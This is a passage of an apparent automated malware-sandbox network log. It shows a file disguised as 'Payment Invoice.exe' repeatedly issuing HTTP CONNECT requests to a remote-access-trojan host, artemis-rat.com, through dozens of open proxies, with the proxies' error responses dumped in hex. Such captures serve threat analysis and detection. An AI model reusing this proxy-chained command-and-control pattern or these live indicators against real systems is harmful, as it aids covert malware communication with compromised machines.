                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683285952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.660942078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.450078202.166.219.8041537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.735369921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.604806900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089438915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.864852905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.45010887.255.200.108600807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.735371113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.895989895 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.44981364.227.108.25319087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.736860037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.450295103.35.189.21731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.738104105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.292310953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.011073112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.432980061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.323859930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324064970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216665030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.027004004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.526734114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.45051393.190.24.1194437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.740359068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.45024368.1.210.16341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.744240046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.45051593.190.24.1194437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.745421886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.45052593.190.24.1194437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.747934103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.45023313.208.168.17931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.748167038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.023205042 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.45053093.190.24.1194437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.749378920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.450205185.217.136.6713377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.756979942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.919898987 CET536INHTTP/1.1 503 Service Unavailable
                                                                Server: squid/3.5.27
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3655
                                                                X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><tit


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.450379104.25.167.88807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.772658110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.926827908 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.450386172.67.231.3807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.776702881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.931071997 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.450278174.64.199.8241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.776702881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.450161218.6.120.11177777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.777132988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.450208223.19.111.185807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.780555964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.464148045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.448546886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511382103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527360916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527055979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.527072906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.323962927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.450411172.67.3.98807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.783740044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.938419104 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                149192.168.2.450414104.24.193.186807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.785151005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.939477921 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                150192.168.2.450231161.97.74.176300007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.786372900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.094974041 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                151192.168.2.450421104.25.81.82807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.787545919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.941735029 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
